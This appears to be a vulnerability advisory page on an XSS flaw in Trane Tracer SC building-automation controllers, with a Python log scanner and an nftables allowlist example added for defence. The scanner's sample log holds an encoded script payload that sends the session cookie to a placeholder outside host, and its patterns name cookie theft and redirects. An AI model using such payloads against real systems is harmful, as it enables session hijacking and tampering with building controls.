OTPulse

Trane HVAC Systems Controls

Monitor | CVSS 6.3 | ICS-CERT ICSA-21-292-02 | Oct 19, 2021
Attack Vector: Network
Auth Required: Low
Complexity: Low
User Interaction: None needed
Summary

A Cross-Site Scripting (XSS) vulnerability exists in Trane Tracer SC building automation controllers running firmware v3.8 and prior. An attacker with network access to the controller's web interface can inject script that executes in the browser of an authenticated user. The injected script can redirect that user to an attacker-controlled page and exfiltrate their session cookie, which can then be replayed to reach controller functions as that user. Tracer SC is end-of-life as of December 31, 2022; Trane recommends migration to the Tracer SC+ controller.

What this means
What could happen
An attacker with network access could redirect HVAC operators to a malicious website and steal their login cookies, potentially gaining unauthorized access to the building control system. This could allow an attacker to alter temperature setpoints, disable alarms, or disrupt HVAC operations.
Who's at risk
Building facility managers and HVAC operators at any organization running Trane Tracer SC building automation controllers. This affects commercial and institutional buildings relying on Tracer SC for temperature, humidity, and equipment control. Particularly important for critical facilities like hospitals, data centers, and manufacturing plants where HVAC disruption could impact operations or safety.
How it could be exploited
An attacker on the network could perform a Cross-Site Scripting (XSS) attack against the Tracer SC web interface. By injecting malicious script code, the attacker could redirect an authenticated user to a fake login page or malicious site to capture their session cookie, then use that cookie to access the controller without needing their password.
Prerequisites
  • Network access to the Tracer SC web interface (typically TCP port 80 or 443)
  • A victim user who is logged into the Tracer SC controller, or who opens a crafted link while authenticated
  • Low-privileged access to the controller: the "Auth Required: Low" rating above (CVSS Privileges Required: Low) means the attacker needs some web interface account to plant the payload, but not administrator credentials

  • Remotely exploitable over the network
  • Only low-privileged credentials required; no administrator access
  • Low complexity attack
  • End-of-life product: the vendor will not provide long-term support
  • Affects building control systems that operators rely on daily
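As an added example that is not part of the OTPulse advisory or of any Trane software, the following Python scans web access logs for the pattern described above: script injected into requests to the controller's web interface, including double-encoded payloads and references to document.cookie or a forced redirect. The log lines, the /hui/... and /api/... paths and the addresses are constructed placeholders; Tracer SC's real endpoint names and log format are assumptions you would replace with whatever your reverse proxy or the controller actually records.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (Apache/nginx combined format) as a reverse proxy
# or monitoring tap in front of the controller might record it. The paths,
# addresses and timestamps are made up for this example; they are not real
# Tracer SC endpoints or logs.
SAMPLE_LOG = """\
10.20.1.15 - - [19/Oct/2021:10:01:02 +0000] "GET /hui/hui.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.20.1.15 - - [19/Oct/2021:10:01:09 +0000] "GET /api/points?name=AHU-1%20Supply%20Temp HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.20.9.77 - - [19/Oct/2021:10:02:30 +0000] "GET /hui/search?q=%3Cscript%3Elocation%3D%27http%3A%2F%2F198.51.100.7%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 4090 "-" "Mozilla/5.0"
10.20.9.77 - - [19/Oct/2021:10:02:41 +0000] "GET /hui/search?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 4088 "-" "curl/7.68.0"
10.20.1.15 - - [19/Oct/2021:10:03:00 +0000] "POST /api/setpoint HTTP/1.1" 204 0 "http://10.20.0.5/hui/hui.html" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target proto", status, size, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators of injected script. Each is checked against the fully decoded
# request target, so %3C, %253C and similar encodings cannot hide a '<'.
XSS_PATTERNS = [
    (re.compile(r"<\s*script\b", re.I), "script tag"),
    (re.compile(r"\bon(?:error|load|click|mouseover|focus|pageshow)\s*=", re.I), "event handler attribute"),
    (re.compile(r"javascript\s*:", re.I), "javascript: URI"),
    (re.compile(r"document\.cookie", re.I), "session cookie access"),
    (re.compile(r'location\s*=\s*[\'"]?https?:', re.I), "redirect to external URL"),
]


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_attempts(log_text: str) -> list:
    """Return one finding per request whose decoded target carries XSS indicators."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess at fields
        decoded = fully_decode(m.group("target"))
        hits = [label for rx, label in XSS_PATTERNS if rx.search(decoded)]
        if hits:
            findings.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "target": decoded,
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in find_xss_attempts(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} -> {f['target']}  [{', '.join(f['indicators'])}]")
```

Run it against the proxy log in front of the controller, or a packet-capture export rendered into the same format. A hit from an address outside the engineering network, followed by requests that carry an existing operator's session cookie from that same outside address, is the sequence the advisory describes. If the payload is stored in a field of the interface rather than reflected, only the planting request carries the indicator; the victims' later page loads look normal, so also review fields operators can edit.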
Exploitability
Low exploit probability (EPSS 0.3%)
Affected products (1)
  Product: Tracer SC
  Affected versions: firmware v3.8 and prior (≤ 3.8)
  Fix status: fixed in firmware v4.4 SP7 or higher
Remediation & Mitigation
Do now
HARDENING: Implement network segmentation so that only authorized engineering workstations and management networks can reach the Tracer SC web interface. Use firewall rules to limit inbound connections to TCP ports 80 and 443 on the controller to those sources, and log what is dropped so that probing from other segments is visible.
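As an added example, not from the advisory or from Trane, the following Python models the allowlist that the HARDENING item describes and renders it as an nftables ruleset for a gateway that forwards traffic between the engineering network and the controller's segment. The controller address 10.20.0.5, the workstation subnet 10.20.1.0/24 and the single host 10.20.2.10 are assumed placeholders, and the table and set names are invented; nothing here is Tracer SC's own configuration.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class ControllerAcl:
    """Allowlist for one Tracer SC web interface: who may reach ports 80/443."""
    controller: ipaddress.IPv4Address
    allowed: list            # IPv4Network objects for engineering workstations
    ports: tuple = (80, 443)
    set_name: str = "eng_workstations"   # assumed name for the nftables set

    @classmethod
    def build(cls, controller: str, allowed_sources, **kw) -> "ControllerAcl":
        # strict=False lets an operator pass a host address with a prefix
        # length (e.g. 10.20.1.15/24) without tripping over set host bits.
        nets = [ipaddress.ip_network(s, strict=False) for s in allowed_sources]
        return cls(ipaddress.ip_address(controller), nets, **kw)

    def is_allowed(self, src: str, dst: str, dport: int) -> bool:
        """Simulate the gateway decision for one TCP connection attempt."""
        if ipaddress.ip_address(dst) != self.controller or dport not in self.ports:
            # Only the controller's web ports are governed here; the chain
            # policy below is accept, so everything else passes unchanged.
            return True
        source = ipaddress.ip_address(src)
        return any(source in net for net in self.allowed)

    def nft_ruleset(self) -> str:
        """Render the same policy as an nftables ruleset loadable with `nft -f`."""
        elements = ", ".join(str(n) for n in self.allowed)
        ports = ", ".join(str(p) for p in self.ports)
        web = f"ip daddr {self.controller} tcp dport {{ {ports} }}"
        return "\n".join([
            "table inet tracer_sc_acl {",          # assumed table name
            f"    set {self.set_name} {{",
            "        type ipv4_addr",
            "        flags interval",               # allows prefixes as elements
            f"        elements = {{ {elements} }}",
            "    }",
            "    chain forward {",
            "        type filter hook forward priority 0; policy accept;",
            f"        {web} ip saddr @{self.set_name} accept",
            f"        {web} log prefix \"tracer_sc_denied: \" drop",
            "    }",
            "}",
            "",
        ])


if __name__ == "__main__":
    acl = ControllerAcl.build("10.20.0.5", ["10.20.1.0/24", "10.20.2.10"])
    print(acl.nft_ruleset())
    for src in ("10.20.1.15", "10.20.9.77"):
        verdict = "allowed" if acl.is_allowed(src, "10.20.0.5", 443) else "blocked"
        print(f"{src} -> {verdict}")
```

The drop rule logs with a fixed prefix so that connection attempts from outside the allowlist show up in the gateway's kernel log and can be alerted on. The policy deliberately covers only the web interface ports the advisory is about; any other service the controller exposes needs its own rule, and if the controller is reachable over IPv6 the same pair of rules must be repeated with ip6 match expressions.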
Schedule — requires maintenance window
Patching may require a device reboot; plan for process interruption.
HOTFIX: Upgrade Tracer SC firmware to version 4.4 SP7 or higher. Contact a regional Trane office to perform the firmware update or reference service database number HUB-207592.
Long-term hardening
HARDENING: Develop and execute a migration plan to replace Tracer SC controllers with Tracer SC+ controllers, which provide enhanced security and are actively maintained. Tracer SC reaches end-of-life on December 31, 2022.